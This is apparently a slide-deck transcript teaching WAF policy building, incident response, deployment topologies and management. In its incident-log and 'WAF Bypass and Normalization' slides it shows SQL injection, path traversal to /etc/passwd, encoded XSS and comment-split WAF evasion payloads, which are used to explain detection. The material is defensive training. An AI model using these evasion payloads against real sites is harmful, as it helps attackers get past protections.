  79. 79. 70295 © ❑ Allow ❑ Monitor ❑ Block Brute force Prevention Rules E D P E D P E D P E D P P ADDoS Prevention Rules Vulnerability Hunting Prevention Rules E D P Bot/Botnet Prevention Rules APP © E D P E D P E D P E D P E D
  80. 80. 70295 © A. What you want B. How do to it E D P ? ? ? • App Risk level • Human labor • WAF capabilities WAF policy – building
  81. 81. 70295 © WA-CAV BRUTE FORCE ADDoS WEB EXPLOITS AUTOMATED ATTACKS Brute force Rules ADDoS Rules Web Exploits Rules Bot/Botnet Rules WAF POLICY Policy Goal: rule sets to mitigate WA-CAV Risk
  82. 82. 70295 © Labor How many people • Knowledge • Skill sets • Experience Working hours: 1 person per 20 base polices Off hours: 1 person – monitoring / acting • Web app type : traffic, users, criticality • Polices number / apps (total) • Policy complexity – number of PE’s (features) • Coverage – follow the sun *Estimations
  83. 83. 70295 © Capabilities •SQLi •XSS •LFI/ RFI •RCE •CSRF Web Exploits •BF •CS •PS ATO •floods •Loads DDoS Parser: • HTML • HTTP • API • JSON Detections : • Signatures • Anomaly • Restrictions • Client intg Enforcer • Alert • Block • Limit • Follow up Edge / Perimeter / Mesh Vendor A Vendor B Vendor C Vendor X
  84. 84. 70295 © ►What you want ►How do to it E D P ? WAF policy – building
  85. 85. 70295 © How to build a policy Create Rule Verify Rule Enforce Rule A good rule: ▪ No false positive ▪ Blocking the defined criteria E D P C V E Pass traffic: • No hits – enforce • Hits – keep in alert mode • Define the entity/ies • Configure the detections • Apply prevention action (beyond alert)
  86. 86. 70295 © Ways to build polices ➢ Manual ➢ Heuristics ➢ Statistics ➢ Aggregations Protocol Payload User input SIGNATURES RESTRICTIONS ANOMALY CLIENT INTERROGATION ALERT BLOCK LIMIT FOLLOW UP Define entity Config detection Apply prevention action Traffic Trusted traffic concept No attack traffic. If hit -> false positive
  87. 87. 70295 © Attacks •Brute force •DDoS •Web Exploit •Bot/Botnet Mitigations •Anti ATO •Anti Floods •Anti RCE •Anti Automation PE •Anomaly, CI •Anomaly, CI, UA •Signature, meta char enforcement •Session anomaly, structure, position Mitigations = Detection + Prevention
  88. 88. 70295 © E D P E D P Valuable user – blocked on false positive rule Real Attack Valuable user Why ? False Positives – the enemy of security value False positive – identifying good traffic as bad traffic i.e. the rule get hit but it is not an attack
  89. 89. 70295 © P E D P APP Create rule Verify rule Enforce E D P E D Alarm – no Hit Alarm - Hit Blocking – Hit Outcome: a) Hits are false positives – Refine or keep in alert b) Hits are attack – Blocked c) Hits are FP and RA – Sperate the rules or add other migrations d) No hits – Block when Timeline e) Hits (Few) - keep in Alert (default) Rules maturity / life cycle Timeline
  90. 90. 70295 © Entity Bad parsing Un supported protocol Bad payload Detections Signatures – know word Anomaly – wrong thresholds Restrictions – legitimate mc Client int – wrong ID Prevention Block – good users Honey pot – wrong data False positive examples
  91. 91. 70295 © WAF Policy – Features Brute force Rules E D P E D P E D P E D P E D P E D P E D P ADDoS Rules Vulnerability Hunting Rules E D P E D P E D P Bot/Botnet Rules APP WAF POLICY ❑ Signature ❑ User agent ❑ Headers ❑ User input ❑ Normalization engine ❑ Brute force protection ❑ Distrusted brute force ❑ Prevention ❑ Ban for X hours ❑ CAPTCHA ❑ Bot protection ❑ Web scraping protection ❑ Log all transaction ❑ Slow post detection
  92. 92. 70295 © Reporting SECURITY REPORTING 3. REPORTING - VISUALIZATION 2. CONTROL PLAIN – SETTINGS 1. DATA PLANE - WAF ENGINES GRAPHS STATISTICS LOGS DASHBOARD
  93. 93. 70295 © App health Incidents WAF Security level Traffic E:H D:S BLOCK E:URL D:A ALARM 1IP 100 Req Critical E:IP D:R RATE LIMIT Medium High 1IP 10Req 10IP 1000Req Brute force App DDoS Web Exploit 60% 70% 50% 56.00% 58.00% 60.00% 62.00% 64.00% 66.00% 68.00% 70.00% 72.00% App 1 App2 App3 App4 SIRT WA-CAV WAF Health Load avr% Numbers CPU 65% 16 core Memory 55% 64GB Throughput 35% 6.66G RPS 25% 111,000 99 LIVE I’M OK
  94. 94. 70295 © Aggregated 21.21k 23.57 36.72k 10.10.1.12 2.75k 3.05 4.08k 172.29.46.44 2.26k 2.51 5.27k 192.168.1.1 2.25k 2.50 3.10k 172.16.184.126 2.23k 2.48 4.64k 192.168.1.12 2.01k 2.23 2.82k 0 500 1000 1500 2000 2500 3000 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 RPS @ URL / Top URL’s RPS / 21.21k /search.php 2.75k /login.php 2.26k /sell.php 2.25k /user_login.php 2.23k /blog.php 2.01k Statistics 0 1000 2000 3000 4000 5000 RPS @ Login.php 10.10.10.0 10.10.20.0 10.10.30.0 10.10.40.0 10.10.50. total Graphs
  95. 95. 70295 © Security Incident log R1 GET /314355195369564852’2.php HTTP/1.1 User-Agent: (/Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101/,;/> Pragma: no-cache Cache-Control: no-cache Content-Length: -40 Host: sirt.club R2 TRACK / HTTP/1.1 Connection: Keep-Alive Host: sirt.club User-Agent:: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKip/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Trace-Test: Nikto Incident Incident Incident Incident Incident R1 R2 R3 R4 Rx R1 GET /3143551953695648522.php HTTP/1.1 User-Agent: Mozilla/5.0 Host: sirt.club Entity: 3143551953695648522.php Detections: meta char in URL ‘ Prevention: blocking page Time: 11:12:13 Source IP: 10.0.0.138 R3 OPTIONS /API%20/V1/login HTTP/1.1 User-Agent: Mozilla/5.0 Firefox/11.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Host: sirt.club Aka: request/Response logs
  96. 96. 70295 © Security Incident, the moment we all being waiting for – the money time ! IR Win
  97. 97. 70295 © Security Incident Response ▪ Apply to security product/service ▪ Deal with modern threat landscape ▪ Small clear actions ▪ Rapid process ▪ Agile IR ❑ Fast mitigation ❑ Easy to use ❑ Scalable ❑ Repeatable ❑ Measurable The Money Time
  98. 98. 70295 © 2.MITIGATION 1.AM I 3.RESPONSE BTR INVOCATION
  99. 99. 70295 © INVOCATION Invocation – a possible security related issue/s needs attention, Now ► Security Device ► App monitoring ► Humans P1.AMI INVOCATION
  100. 100. 70295 © ► Security Device - WAF Protection elements ( policy ) INVOCATION TYPES ► 3rd party security / monitoring software or services ► Humans – customers complaints, other department personnel nonfiction Hello support: your app is NOT working !?!? SUPPORT LOAD App dude: hey, its eating resources $$$
  101. 101. 70295 © INVOCATION – ACT! ▪ Dashboard alert ▪ Email ▪ SMS ▪ Instant messaging ▪ Phone call WAF notification center ATTACK! Message: • What happen : • How bad it looks • How long :
  102. 102. 70295 © 1. AM I • S1 – Service down • S2 – Major impact • S3 – General impact Declare the incident type and Determine the impact Am I under attack ? RA – Real attack FP – False positive FA – False alarm BTR Impact incident type
  103. 103. 70295 © 1. AM I • Severity: S1 • Status: Active Attack • Damage: Major • Affecting: ❑ Service ❑ Data ❑ Compute • Act: Now (4H – 12H) • Severity: S2 • Status: Active / Immanent • Damage: Moderate / Potential • Affecting: ❑ Service ❑ Data ❑ Compute • Act: Now / Soon (12H – 24H) • Severity: S3 • Status: Security Related • Damage: Minor • Affecting: ❑ Service ❑ Data ❑ Compute • Act: Soon/ Later (24H – 3D)
  104. 104. 70295 © 1. AM I • S1 – Service down • FP: Mass • Damage: Visible Blocking • Affecting: ❑ Service ❑ Data ❑ Compute • Act: Now (4H – 12H) • Severity: S2 • FP: Many • Damage: Affecting Traffic • Affecting: ❑ Service ❑ Data ❑ Compute • Act: Now / Soon (12H – 24H) • Severity: S3 • FP: Specific • Damage: Passive FP • Affecting: ❑ Service ❑ Data ❑ Compute • Act: Soon/ Later (24H – 3D)
  105. 105. 70295 © 2. MITIGATION I. Searching Suspicious indicators (3SIN) II. Compose Prevention rule (PR) How to mitigate (Seek & Destroy ) Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR) • Detection + Prevention = Mitigation
  106. 106. 70295 © I. Suspicious indicators 2. MITIGATION Attack Elements ▪ Vulnerability ▪ Attack Surface ▪ Attack Agent ▪ Exploit ▪ Attack Vector ▪ AMO Protection Elements ▪ Signatures - Pattern matching ▪ Anomaly - Aggregation and thresholds ▪ Restrictions - Allow / Block lists ▪ Client Interrogation - HTTP client inspection GRAPHS STATISTICS LOGS DASHBOARD REPORTING
  107. 107. 70295 © 2. MITIGATION WA-CAV policy •SQLi •XSS •LFI/ RFI •CSRF •RCE Web Exploits •BF •CS •PS ATO •Floods •Loads DDoS SIGNATURES RESTRICTIONS ANOMALY CLIENT INTG ANOMALY ANOMALY CLIENT INTG RESTRICTIONS I. Suspicious indicators
  108. 108. 70295 © 2. MITIGATION SIRT FIP Forensic Investigation Procedure Classify Sources Examine Patterns Internet POST / login.php HTTP/1.1 Connection: Keep-Alive Host: sirt.club Content-Length: 59 User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221) Content-Type: application/x-www-form-urlencoded username=' or 1=1--&password=123456action=login I. Suspicious indicators
  109. 109. 70295 © 2. MITIGATION I. Suspicious indicators (3SIN) II. Prevention rule (PR) How to mitigate (Seek & Destroy ) Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR) • Protection Rules – general policy - policy • Prevention Rule – specific attack - SIR
  110. 110. 70295 © E D P Prevention Rule WA-CAV BRUTE FORCE ADDoS VULNERABILITY HUNTING AUTOMATED ATTACKS 2. MITIGATION II. Prevention Rule (PR) • Wide vs narrow rules • Specific rule vs general rule Goal: • Prevention rule / Features • Few prevention rules / Features
  111. 111. 70295 © 3. RESPONSE I. Apply mitigation strategy II. Monitor mitigation Apply prevention rule and verify attack mitigation Response – Apply & Verify
  112. 112. 70295 © Policy Policy Policy Policy Policy Policy CLIENTS MGMT Apply Prevention Rule {CONTROL PLAIN} E D P
  113. 113. 70295 © 3. RESPONSE I. Apply mitigation strategy II. Monitor mitigation Apply prevention rule and verify attack mitigation Response – Apply & Verify
  114. 114. 70295 © 0 500 1000 1500 2000 2500 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 URL / ✓ BTR – monitoring attack Response – Apply & Verify 0 500 1000 1500 2000 2500 3000 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 URL / 3. RESPONSE • Return – bypass • Return – different approach – same attack • Revenge – other attack ✓ BTR – EoA – end of attack
  115. 115. 70295 © BTR Back To Routine (BTR) Declaring Back to Routine when attack is being blocked or attack stopped Win IR Win ✓ Damage evaluation report ✓ Severity is 0
  116. 116. 70295 © Recon Attack Start Invocation AmI Mitigation Response Monitoring BTR C. Human work time B. Recovery time A. Response time Incident response - time line What we want to know: A. Response time B. Recovery time C. Working time
  117. 117. 70295 © Attending: ▪ SIRT iMgr _________ ▪ SE Focal____________ ▪ App Dev___________ ▪ Dev Ops___________ ▪ Mgmt __________ Opportunities : ▪ Short term ▪ Long term Incident name: CAV type: Severity App name App type Attack type Win/Lose Cost: o Direct ______________ o Indirect ____________ o 3rd party ____________ Total IR cost: _____________ Incident details High lights Low lights Response time Recovery time Working time ________________ _________________ _________________ AE List: PE List Feature name: RCA Damage control ▪ Auditor_____________ ▪ CxO notification: Y/N datetime
  118. 118. 70295 © 1. AM I 2. MITIGATIONS FINE TUNE BTR RA / FP FP RA SEEK DESTROY 3. RESPONSE APPLY VERIFY SEEK FIX
  119. 119. 70295 © BTR GRAPHS STATISTICS LOGS DASHBOARD 3. RESPONSE 2. MITIGATION 1. AM I INVOCATION Information sources
  120. 120. 70295 © Auto SIR APP WAF POLICY WA-CAV BRUTE FORCE ADDoS VULNERABILITY HUNTING AUTOMATED ATTACKS Brute force Rules E D P E D P E D P E D P ADDoS Rules Vulnerability Hunting Rules E D P E D P E D P Optimized policy (OPR) is detecting and preventing attacks – AUTOMATICLY Maximum Security Value
  121. 121. 70295 © SIR levels 1. AM I 2. MITIGATION BTR 3. RESPONSE INVOCATION Org Division Team Auto
  122. 122. 70295 © Planning the right security architecture is your key for success
  123. 123. 70295 © Home User PC Browser www.site.com Database Servers Application Servers Web Servers WAF Home User PC Browser www.site.com Database Servers Application Servers Web Servers WAF Tap mode Inline WAF mode Res Req
  124. 124. 70295 © Home User PC Browser www Database Servers Application Servers Web Servers App: • CPU • Memory • Network Response size WAF: • CPU • Memory • Network RPS RPS TPS (WAF) TPS (App) Latency HTTP request TLS – handshake TCP IP connection Round trip , TPS (Client) HTTP Transaction - inline device Ingress Egress Latency (T) Processing time Latency • RPS • TPS • Latency • Throughput
  125. 125. 70295 © Firewall WAF Application Server/s Web Server/s Database Server/s ADC Web App ABSTRACTION LAYER/S Application/s Request handler/s Database/s NF NG Clients WAF NG Internet Hybrid Cloud – Public / Private On perm ADC/LB Edge Perimeter App Mesh WAF environment Environment : On perm , Cloud – Public / Private, Multi Cloud, Hybrid
  126. 126. MESH Mesh WAF Edge WAF Perimeter WAF NF NF App srv App srv {API} NF web web WAF Location web web HTTP Clients WAF locations – edge / perimeter/ mesh
  127. 127. 70295 © web web Edge WAF WAF Location: Edge Sanitized traffic FQDN
  128. 128. 70295 © Internet Edge Internet POP2 App1 Zone2 Edge POP1 App1 Zone 1 POP1 POP2 Edge WAF WAF Location: Edge
  129. 129. 70295 © NF Web application Web Bot Requests Responses Application/s Request handler/s AAA Mobile app/ API DataBase/s Perimeter Web Site Analytics ∑ SIEM ≈ Internet WAF Location: Perimeter Perimeter WAF {API}
  130. 130. 70295 © NF Web application Web Bot Requests Responses ABSTRACTION LAYER Application/s Request handler/s AAA Mobile app/ API Data storage Perimeter Web Site Orchestration Analytics ∑ SIEM ≈ Internet DevOps Perimeter 360 WAF WAF Location: Perimeter 360 {API}
  131. 131. 70295 © Login Searching Cart Mgmt Browsers Handler DB DB Payment CD </code..> Machine to machine CI/CD CI/CD CD Continues deployment Continues integration Continues delivery WAF Location: Mesh Mesh WAF Micro Services / API App CP
  132. 132. 70295 © MESH NF NF App srv App srv WAF Strategies Web app Web app Web app CI A SIG/R CI CI A SIG/R SIG/R WAFx3: Edge + Perimeter + Mesh WAFx2: Edge + Perimeter A SIG/R WAFx1: Edge / Perimeter
  133. 133. 70295 © web Requests Responses 1. 3rd party HTTP FQDN NF API Cloud B 1. Edge screening WAF 2. Perimeter WAF 3. Mesh WAF 4. CP/Admin panel WAF 5. 3rd Party WAF 6. CD or CD/CD WAF 7. Scaling WAF – multi clouds 8. Scaling WAF – hybrid apps WAF Strategies 2. 3. 5. 6. 7. 8. 4.
  134. 134. 70295 © Policy building Hardware Operating system WAF Network SIR Configuration / Setups / Updates CLOUD DP - PE CP Managing the software and security Vendor manage You manage You / Vendor manage Reporting
  135. 135. 70295 © Managed Security Security Management Full Security Management Security Management – types WAF aaS ❑ Security report ❑ SIR ❑ Policy ❑ Configuration ❑ Setups ❑ Create / updates ❑ Infrastructure - upgrades ❑ Deployment ❑ OS – Scaling ❑ Security report ❑ SIR ❑ Policy ❑ Configuration ❑ Setups - updates ❑ Create / update ❑ Security report ❑ SIR ❑ Policy ❑ Configuration ❑ Setups ❑ Create / updates ❑ Infrastructure - upgrades ❑ Deployment ❑ OS – Scaling Vendor aaS You You You ❑ Infrastructure ❑ Deployment - upgrades ❑ OS – Scaling You
  136. 136. 70295 © web cloud NF NF App srv web cloud cloud NF SECURITY MGMT Unified Reporting WAF mgmt. Mono MESH MESH
  137. 137. 70295 © WAF architecture capabilities (DSMM) App ❑ Classic ❑ Modern ❑ Mix Environment Cloud ❑ Cloud: Public ❑ Cloud Private ❑ Multi cloud ❑ Hybrid (Cloud <-> OP) On perm ❑ On Prem: Shared Hosting ❑ On Prem: detected hosting ❑ Multi On Prem ❑ Hybrid (OP<->Cloud) Management Management ❑ For you ❑ Semi ❑ You WAF locations ❑ Edge ❑ Perimeter ❑ Perimeter (360) ❑ Mesh ❑ MonoMesh Software SW type ❑ HW OS SW ❑ OS SW ❑ SW Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K Security Mgmt – Sec OPS Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG Security Reporting ❑ Security center (learning) ❑ WAG reporting ❑ graphs ❑ Risk reporting ❑ Statistics ❑ Mitigation reporting ❑ Event log ❑ Forensics OPS Deployment ❑ ISO file ❑ RPM ❑ VM image Config ❑ API ❑ Config file ❑ GUI
  138. 138. 70295 © “Keep it up to date and Never drop the ball, YOU are the last in line and own it Policy Update Upgrade MGMT HA Utility
  139. 139. 70295 © DP WAF 3. REPORTING - VISUALIZATION CP AGENT WAF structure CLIENTS 2. CONTROL PLAIN – MGMT CI/CD
  140. 140. 70295 © WAF software types Hardware Operating System Network Hardware Operating System Network Hardware Operating System Network Hardware Operating System WAF Software Operating System WAF Software WAF Software
  141. 141. 70295 © Hardware Operating System Virtual - OS Network vOS vOS vOS Hardware Operating System Virtual - container Network C1 C2 C3 Hardware Operating System Virtual - Pod Network P1 P2 P3 Hardware Operating System Network Platform • WAF Software • Operating System • Hardware • WAF Software • Operating System • WAF Software ❑ ISO ❑ SW Deployment
  142. 142. 70295 © Deployment Topologies Hardware Operating System Virtual - OS Network vOS vOS vOS Hardware Operating System Virtual - container Network C1 C2 C3 Hardware Operating System Virtual - Pod Network P1 P2 P3 Hardware Operating System Network DATA PLANE REPORTING CONTROL PLANE DATA PLANE CI A SIG/R Platform
  143. 143. 70295 © High availability AKA: Fault tolerant - When master WAF fails Active / Active OS WAF Hardware OS WAF Hardware OS WAF Hardware OS WAF Hardware N+1 concept Active / Stand By
  144. 144. 70295 © WAF 1 WAF 2 WAF 3 WAF 3 WAF 2 Traffic (RPS) Time Load balancing Cluster Scaling Load management N+1 Primary (A) Secondary (Burst) Fault tolerance: (Stand By) Active Active Active New Old Stand By Stand By
  145. 145. WAFcapacity planning - LB Session persistence New session WAF # 1 WAF # 2 App # 1 App # 2 Stand By – online
  146. 146. 70295 © Hardware Operating System Virtual - OS Network vOS vOS vOS Hardware Operating System Virtual - container Network C1 C2 C3 Hardware Operating System Virtual - Pod Network P1 P2 P3 Hardware Operating System Network WAF cluster SB SB WAF cluster WAFcapacity planning – cluster Stand By – online
  147. 147. 70295 © Hardware Operating System Virtual - container C1 C2 C3 Hardware Operating System Virtual - Pod Network P1 P2 P3 Network WAFcapacity planning – scaling The sync challenge Stand By – offline Stand By – offline
  148. 148. 70295 © Standby unit CLIENTS A B Active unit a) Update /Upgrade on B (SB) b) Testing – smoke test or rollback c) Switching to active unit (A->B) d) Make A stand by e) Update /Upgrade on SB (A) f) Verify ok Active unit Standby unit Upgrade / Updates procedure a) Create new from ISO – B b) Import config (from A) c) Testing – smoke test or new install d) Traffic route new traffic - B e) Kill old WAF - A A B
  149. 149. 70295 © Centralized Management (CM) POLICY ALL/APP1 POLICY ALL/APP2 POLICY 20 POLICY 30 POLICY 40 SERVICE: IP:80 SERVICE: IP:8080 SERVICE: IP:8008 POLICY LOGIN/APP2 APP2 APP1 App # 20 App # 30 App # 40 Centralized Management
  150. 150. 70295 © CLIENTS CLIENTS CLIENTS P.MGMT D.MGMT Policy Policy Policy Policy Policy Policy Policy i. Policy management - CRUD – CP ii. WAF management – updates/ upgrades iii. Reporting – visualization Management Types R.MGMT i ii iii
  151. 151. 70295 © web cloud NF NF App srv web cloud cloud NF R.MGMT MESH MESH web Management Levels: → Site → WAF → Policy
  152. 152. 70295 © 3. REPORTING - VISUALIZATION 2. CONTROL PLAIN – SETTINGS 1. DATA PLAIN GUI API CONFIG File Configuration E D P E D P
  153. 153. 70295 © Create Signatures: ❑ Information ❑ Generic ❑ CVE Parameter name: Parameter value: Policy Name: main_App | notification (21)| incident log | support panel Create New Parameter Online help | Contact vendor support * q search.php CLIENTS Configuration – GUI
  154. 154. 70295 © NF WAF NG { API } Mobile client App Mobile Browser LT/ PC Browser { API } LT/ PC CLI { API } { API } { API } Configuration – API Policy {Main_app} Parameter {q} Signatures {specific CVE family} Prevention action {alert , blocking page} WAF API Collection : { API } 3rd party
  155. 155. 70295 © NF WAF NG { API } WAF config file: Policy: Main_app <config> Define Parameter : q Configure signatures – specific CVE Apply – prevention action: alert , blocking page </config> Configuration – Config file #load new config
  156. 156. 70295 © Log format: ✓ Request: URL, Headers, QS,PD, Meta character ✓ Response: headers , post data , meta data ✓ WAF: ALL reporting (raw) ✓ WAF meta data: signature, hit on, CRLF, encoding Log repository Indexing Reporting Ingress ✓ Sys log ✓ SIEM ✓ Repo Set ups Egress
  157. 157. 70295 © Virus – block No virus – pass File upload Set ups - ICAP
  158. 158. 70295 © Reporting WAF LOGS AUDIT MAINTENANCE SYSTEM o Audit – who did what – changes to policy o Maintenance – update / upgrade fails o System – memory, configuration SECURITY REPORTING SUPPORT REPORTING 3. REPORTING - VISUALIZATION 2. CONTROL PLAIN – SETTINGS 1. DATA PLANE - WAF ENGINES GRAPHS STATISTICS LOGS DASHBOARD
  159. 159. 70295 © WAF LOGS AUDIT MAINTENANCE SYSTEM SUPPORT REPORTING o Audit – who did what – changes to policy 3. REPORTING - VISUALIZATION 2. CONTROL PLAIN – SETTINGS o Maintenance – update / upgrade fails o System – memory, configuration #User admin access from IP X on Sunday 1:01 AM GTM #User admin change policy to allow access from IP Y #User admin reboot me Upgrade is needed to version X Update failed Updates for version X is success Resources allocation memory increase in 5M total of 16GB CPU spike to 90% for 10 minutes
  160. 160. 70295 © Utilities Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only Log Repository ❑ Internal ❑ External ❑ Size: 6T ❑ Time: 6-month request ❑ Fault tolerance 3rd party ❑ ICAP ❑ Network FW integration CM ❑ Local ❑ Dedicated ❑ CP utility ❑ Pull / push config ❑ Update/ upgrades ❑ WAF centralized report ❑ Policy Traffic aggregation (unified reporting ) Updates and upgrades Updates ❑ Break Fix ❑ CVE updates ❑ New features ❑ Hotfix ❑ Engineer hot fix ❑ Full update file ❑ GUI ❑ API ❑ Config ❑ RPM ❑ SW ❑ ISO – OS + SW ❑ ISO – SW Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time HA HA ❑ Load balancing ❑ Cluster ❑ Scaling Support tools Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug Policy export – restore ❑ Text ❑ HTML ❑ Binary ❑ JSON ❑ XML ❑ Manual GUI ❑ API
  161. 161. 70295 © Always on the watch ready to exterminate the next attack
  162. 162. 70295 © WAF Management POLICY ALL/APP1 POLICY ALL/APP2 POLICY 20 POLICY 30 POLICY 40 SERVICE: IP:80 SERVICE: IP:8080 SERVICE: IP:8008 POLICY LOGIN/APP2 • Site level • Zone level • App level CI A SIG/R • Edge -> screening • Perimeter -> classic • Mesh -> microservice
  163. 163. 70295 © Web Application ABSTRACTION LAYER/S Application/s Request handler/s AAA Database/s SIEM ≈ { API } Admin Mobile client App Mobile Browser { JSON } { API } Mobile app/ {API} Browser { API } CLI Analytics ∑ Policy strategies – Separation of Entry Point [QS/PD]
  164. 164. 70295 © {API} Web Application ABSTRACTION LAYER/S Application/s Request handler/s AAA Data storge SIEM ≈ { API } { API } { API } Web App Admin Mobile client App Mobile Browser { JSON } { JSON } [QS/PD] { API } { API } Mobile app/ {API} Browser { API } CLI Data Plane API Control Plane API Integration API Deploy API Analytics ∑ API entry point protection points [QS/PD]
  165. 165. 70295 © Application/s Request handler/s Data storge Firewall ADC WAF Application/s Request handler/s Data storge WAF NG 3RD PARTY SW • Server/s • Services • Libraries • Functions FREE FOR ALL ADC Firewall Boarder Router Boarder Router Exists but not exploitable Supply chain attacks
  166. 166. 70295 © NF E HTTP IP CONTROL PLANE DATA PLANE Remote admin Corporate network Corporate admin App usage App usage Attacker: • APP Vul • CP vul Corporate user Control plane protection
  167. 167. 70295 © WA-CAV policy Anti Auto Anti floods Anti bf Anti web exploit Multi layer security solution AUTOMATED ATTACKS WEB EXPLOITS BRUTE FORCE ADDoS CI: First request CI: First response A: Session opening rate A: RPS increase on Session S: User agent A: RPS from IP A: RPS to URL A: RPS from Geo A: RPS from session A: RPS from IP to login URL A: RPS from any IP to login URL A: RPS from Geo to login URL A: RPS from session to login URL S: Specific CVE exploits S: Generic exploits R: Meta char on parameter values R: Anti evasions
  168. 168. 70295 © Parser - Entities Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API Payloads ❑ Text ❑ JSON ❑ XML User input ❑ Login ❑ Search text ❑ Posting Traps - Detections Signature ❑ Informational (W,B,D) ❑ Generic exploits (W,B,D) ❑ Specific exploit (W) Anomaly ❑ Request per second (W,B,D) ❑ Failed log in (B) ❑ Session opening (W,B,D) Restriction ❑ Characters sets (W,B) ❑ RFC & evasion (W,B,D) ❑ Flow Client interrogation ❑ CAPTHCA (W,B,D) ❑ Client capabilities (W,B,D) ❑ Source ID (SID) (W,B,D) Enforcer - Prevention Action ALERT ❑ GUI: dashboard / iLog [M] ❑ Email / SMS ❑ Instant messaging BLOCK ❑ Blocking page [M] ❑ TCP FIN / RESET /Drop [M] ❑ Stripping / Cloaking LIMIT ❑ Rate limiting (RPS) [M] ❑ Time limiting [M] ❑ Session limiting FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation Protection elements -> PR
  169. 169. 70295 © CI A SIG/R Scrubbing center Threat actors Risky users/ traffic MVU – Most valuable users PVU - Potential valuable users Authorized automation Users group – WAF as a traffic manager Partners 3rd Party
  170. 170. 70295 © SIGNATURES ANOMALY ANOMALY RESTRICTIONS ANOMALY SIGNATURES Site Access Policy (SAP)
  171. 171. 70295 © Forensic Investigation Procedure S M V Classify Sources • Source IP – RPS • Source IP – sessions • Source IP geo Classify client • Simple client / simple bot • Browser / full browser bot • Human / full human bot Classify Pattern • Well formed • Structure • Position Verdict • V: Clearly good user request • M: Clearly harmful request • S: Potentially harmful Prevention Action: ✓ Allow ✓ Exempt – all/ partial X Block – specific request / IP X Shun – all traffic from IP/session ? Monitoring – need more data Forensic Investigation Procedure (SIRT FIP) / A B Classify Actions • CRUD • Flow • Timeline
  172. 172. 70295 © Simple bot Full Browser Bots Full Human Bots CI – L1 Browser base test CI – L2 Browser Attributes CI – L3 Mouse movements HTTP Client Classification Simple client Browser client Human client Pass / Fail
  173. 173. 70295 © Device IP Sessions RPS Flow / Top URL’s Laptop New 10 100 Register Login Cart Pay PC Returning 15 1000 Browse_IS Login Pay IOT New 1000 25000 /ping /swcheck Mobile phone – browser Returning 150 3500 /sell /browser?ID= Mobile phone – App New 2 30 appmobile/V1/ Classify sources: Clients / sources / users – RPS – Historical
  174. 174. 70295 © Security Request log R1 GET /314355195369564852’2.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Pragma: no-cache Cache-Control: no-cache Content-Length: 0 Host: sirt.club R2 TRACK / HTTP/1.1 Connection: Keep-Alive Host: sirt.club User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Trace-Test: Nikto Incident Incident Incident Incident Incident R1 R2 R3 R4 Rx R1 GET /3143551953695648522.php HTTP/1.1 User-Agent: Mozilla/5.0 Host: sirt.club Entity: 3143551953695648522.php Detections: meta char in URL ‘ Prevention: blocking page Time: 11:12:13 Source IP: 10.0.0.138 R3 OPTIONS /API/V1/login HTTP/1.1 User-Agent: Mozilla/5.0 Firefox/11.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Host: sirt.club Classify Pattern • ETF • ATF • User input • Well known • Context
  175. 175. 70295 © User action and flow / Info dynamic products ProductID Cat Login username password Account Username email Payment pay CCN checkout amount password a) Main page browser b) Link: Login page c) Bookmark: account d) Login a) Browse /add items b) Login c) Auto Login d) login a) Check out b) Update CCN c) Browser items d) Login a) Payment b) Browse Items c) Payment d) Login 1 min 2min 30sec 1 sec 2 sec 1.5 sec Classify Actions
  176. 176. 70295 © WAF bypass WAF security exposure WAF Bypass and Normalization
  177. 177. 70295 © % Case insensitive % Comments % Encoding % Tricks and Koontz Goal: bypass the WAF protections WAF Bypass and Normalization GET /search.php?q=../../../../../../etc/passwd HTTP/1.1 GET /search.php?q=&#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c HTTP/1.1 GET /search.php?q= SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#10 5;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116; &#40;&#39;&#88;&#83;&#83;&#39;&#41;> GET /search.php?q=&quot; &apos; exploit &amp; &lt; &gt; &nbsp;
  178. 178. 70295 © Path Obfuscation/Evasion GET /search.php?q=/etc////passwd HTTP/1.1 Host: #@$!$#@$ /etc////passwd /etc/passwd Web server accept and change it to: “What should the WAF do ? /etc/passwd /etc////passwd Match signature : Allow / Block
  179. 179. 70295 © Normalization – Anti Bypass GET /search.php?q=ExPloiT HTTP/1.1 Host: sirt.club Norm WAF Signature Change to lower case exploit Remove comment in the parameter value -> match sig ‘and 1=0 union select all from table; Any True condition in the parameter value -> match sig Any OR X = X/Y - block GET /search.php?q=' and 1=0 un/**/ion/**/sel/**/ect all f/*haha*/rom table HTTP/1.1 Host: sirt.club OR ‘bypass' = ‘bypass’ OR ‘Bypass’ = A’Bypass' OR 'Koontz' = ' Koo'+'ntz' OR 'Koontz' LIKE ‘Koo%' OR 'Koontz' > ‘K' OR 'Koontz' < ‘Z'
  180. 180. 70295 © 0 5 10 15 FISCAL YEAR TRAFFIC REPORT CVE 10.0 Heads up Imminent by design Activism Sales promotions $ D Day’s Threats actor opportunity Shopping
